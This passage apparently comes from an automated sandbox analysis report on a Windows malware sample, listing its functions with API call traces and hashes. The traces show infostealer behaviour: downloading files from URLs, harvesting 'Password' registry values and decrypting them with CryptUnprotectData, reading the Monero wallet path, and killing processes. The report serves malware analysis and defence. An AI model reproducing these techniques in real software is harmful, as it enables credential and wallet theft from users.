                                    • StrCmpCA.SHLWAPI(?,00A9E928), ref: 00F66B4A
                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00F66B6A
                                    • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00F66B88
                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00F66BA1
                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00F66BC6
                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00F66BF0
                                    • CloseHandle.KERNEL32(00000000), ref: 00F66C10
                                    • InternetCloseHandle.WININET(00000000), ref: 00F66C17
                                    • InternetCloseHandle.WININET(?), ref: 00F66C21
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                    • String ID:
                                    • API String ID: 2500263513-0
                                    • Opcode ID: 4ef3502726b3bcc3bcb43ce95800e57e111ccea2bc96ffec3eed404e3eee4693
                                    • Instruction ID: 427076e8fdf1aea6002ccb31b527d6cc438a7275ae25787a4a1948725998b205
                                    • Opcode Fuzzy Hash: 4ef3502726b3bcc3bcb43ce95800e57e111ccea2bc96ffec3eed404e3eee4693
                                    • Instruction Fuzzy Hash: 4941A3B1A00209EBDB24DF64DC49FAE77B8EF44705F004568FA15E7280EB70AD409BA4
                                    Function 00F6BBF9 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6BC1F
                                    • lstrlen.KERNEL32(00000000), ref: 00F6BC52
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6BC7C
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6BC84
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6BCAC
                                    • lstrlen.KERNEL32(00F94AD4), ref: 00F6BD23
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat
                                    • String ID:
                                    • API String ID: 2500673778-0
                                    • Opcode ID: 9478d4f23db6d7dbcce452b26d969c1321bfd31e699c82486812b81b400de834
                                    • Instruction ID: b8ebd07fcac81b751cd39896a68aabe57839292d3c1148f317ef3ae2d40dc48e
                                    • Opcode Fuzzy Hash: 9478d4f23db6d7dbcce452b26d969c1321bfd31e699c82486812b81b400de834
                                    • Instruction Fuzzy Hash: 79A19070A112098FCB75DF68D949AAEB7B4BF44324F18807DE415DB251DB3ADC82EB50
                                    Function 00F85EE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 00F85F2A
                                    • std::_Xinvalid_argument.LIBCPMT ref: 00F85F49
                                    • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00F86014
                                    • memmove.MSVCRT(00000000,00000000,?), ref: 00F8609F
                                    • std::_Xinvalid_argument.LIBCPMT ref: 00F860D0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Xinvalid_argumentstd::_$memmove
                                    • String ID: invalid string position$string too long
                                    • API String ID: 1975243496-4289949731
                                    • Opcode ID: 95e74475eefac5f6460a8f0a95067e0c382f7151fb9f41c4cd57591e9e5799e9
                                    • Instruction ID: fd10314d223db3973aa462d16bb7bf04bd3ee27480863bb2acb6eb09afd6bda7
                                    • Opcode Fuzzy Hash: 95e74475eefac5f6460a8f0a95067e0c382f7151fb9f41c4cd57591e9e5799e9
                                    • Instruction Fuzzy Hash: 2E619F71B00544DBDB18EF5CCC94AAEB7B6EF84704B244A19E592CB381D731ED80AB99
                                    Function 00F7E049 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7E06F
                                    • lstrcat.KERNEL32(?,00000000), ref: 00F7E07D
                                    • lstrcat.KERNEL32(?,?), ref: 00F7E098
                                    • lstrcat.KERNEL32(?,?), ref: 00F7E0AC
                                    • lstrcat.KERNEL32(?,00A8B860), ref: 00F7E0C0
                                    • lstrcat.KERNEL32(?,?), ref: 00F7E0D4
                                    • lstrcat.KERNEL32(?,00A9DCF0), ref: 00F7E0E7
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7E11F
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00F7E126
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$AttributesFile
                                    • String ID:
                                    • API String ID: 3428472996-0
                                    • Opcode ID: d14c68538c9452ff14c2c915425607501c65340ec231409d9d6a13e880478719
                                    • Instruction ID: ad6a997f233d869bc5c57534b5d4a9ee30de0faee61a073a51a1fa60af4ce6e2
                                    • Opcode Fuzzy Hash: d14c68538c9452ff14c2c915425607501c65340ec231409d9d6a13e880478719
                                    • Instruction Fuzzy Hash: 2E41E271D1011C9BCB65EB64DC49ADD73B8BF4C310F4489AAF52A93200DBB89F85AF90
                                    Function 00F67A60 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 109stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F677D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00F67805
                                      • Part of subcall function 00F677D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00F6784A
                                      • Part of subcall function 00F677D0: StrStrA.SHLWAPI(?,Password), ref: 00F678B8
                                      • Part of subcall function 00F677D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F678EC
                                      • Part of subcall function 00F677D0: HeapFree.KERNEL32(00000000), ref: 00F678F3
                                    • lstrcat.KERNEL32(00000000,00F94AD4), ref: 00F67A90
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F67ABD
                                    • lstrcat.KERNEL32(00000000, : ), ref: 00F67ACF
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F67AF0
                                    • wsprintfA.USER32 ref: 00F67B10
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F67B39
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F67B47
                                    • lstrcat.KERNEL32(00000000,00F94AD4), ref: 00F67B60
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                    • String ID: :
                                    • API String ID: 398153587-3653984579
                                    • Opcode ID: 39df2105952512819b3bdbfdd8249fef7e77572b2f13781b13ad2dea91bf321e
                                    • Instruction ID: 4444eeb7de55ca2704a94d537ae53e30d58c8f2aba0b7c533671de4025cc019b
                                    • Opcode Fuzzy Hash: 39df2105952512819b3bdbfdd8249fef7e77572b2f13781b13ad2dea91bf321e
                                    • Instruction Fuzzy Hash: 4031C572A0421CAFCB24EFA8D844DAFB779EB8471CB18052DE52593204DB75E985EB60
                                    Function 00F781B0 Relevance: 12.7, APIs: 10, Instructions: 175stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 00F7820C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F78243
                                    • lstrlen.KERNEL32(00000000), ref: 00F78260
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F78297
                                    • lstrlen.KERNEL32(00000000), ref: 00F782B4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F782EB
                                    • lstrlen.KERNEL32(00000000), ref: 00F78308
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F78337
                                    • lstrlen.KERNEL32(00000000), ref: 00F78351
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F78380
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: 071b8a119199d234cc1335d80a7b8f2228c7acaa9d384c1b86fc1e1d399a2f42
                                    • Instruction ID: 0b71ab782d48474497db0a028876b11ce3c9a58295bf024f3a8fa8f3ddcd144c
                                    • Opcode Fuzzy Hash: 071b8a119199d234cc1335d80a7b8f2228c7acaa9d384c1b86fc1e1d399a2f42
                                    • Instruction Fuzzy Hash: 9651F0719006029BDB64DF38D858A6AB7B8FF44790F008125ED1ADB244EB34ED51DBE1
                                    Function 00F677D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 208registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00F67805
                                    • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00F6784A
                                    • StrStrA.SHLWAPI(?,Password), ref: 00F678B8
                                      • Part of subcall function 00F67750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 00F6775E
                                      • Part of subcall function 00F67750: RtlAllocateHeap.NTDLL(00000000), ref: 00F67765
                                      • Part of subcall function 00F67750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00F6778D
                                      • Part of subcall function 00F67750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00F677AD
                                      • Part of subcall function 00F67750: LocalFree.KERNEL32(?), ref: 00F677B7
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F678EC
                                    • HeapFree.KERNEL32(00000000), ref: 00F678F3
                                    • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00F67A35
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                    • String ID: Password
                                    • API String ID: 356768136-3434357891
                                    • Opcode ID: 4cc0db290af69da511b95f26eb033af0a4ec71484b07dc73371370ea26a1a10c
                                    • Instruction ID: e92c7b556a229b0887dfda2dae439ef404f7c884c7701efe90bcae360f6c1c3a
                                    • Opcode Fuzzy Hash: 4cc0db290af69da511b95f26eb033af0a4ec71484b07dc73371370ea26a1a10c
                                    • Instruction Fuzzy Hash: 287150B1D0021DABDB10DF95CC80ADEB7F8FF49314F14416AE519A7200EB35AA85DFA1
                                    Function 00F84500 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 95memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00F74F39), ref: 00F84545
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F8454C
                                    • wsprintfW.USER32 ref: 00F8455B
                                    • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 00F845CA
                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 00F845D9
                                    • CloseHandle.KERNEL32(00000000,?,?), ref: 00F845E0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                                    • String ID: %hs
                                    • API String ID: 885711575-2783943728
                                    • Opcode ID: 28d44665d1acd29a59a47db2d90b764333fdbc04484791f78dcd0caf1d8f4f87
                                    • Instruction ID: 05cb1e334401c8ce1b8c01fe5740f92f25e0fa659a821247e8e93f4fdd03b65c
                                    • Opcode Fuzzy Hash: 28d44665d1acd29a59a47db2d90b764333fdbc04484791f78dcd0caf1d8f4f87
                                    • Instruction Fuzzy Hash: 95315072A00209ABEB24EBE4DC45FDE777CBF45700F144069F625E7184DB74AA818BA6
                                    Function 00F61120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F61135
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F6113C
                                    • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00F61159
                                    • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00F61173
                                    • RegCloseKey.ADVAPI32(?), ref: 00F6117D
                                    Strings
                                    • SOFTWARE\monero-project\monero-core, xrefs: 00F6114F
                                    • wallet_path, xrefs: 00F6116D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
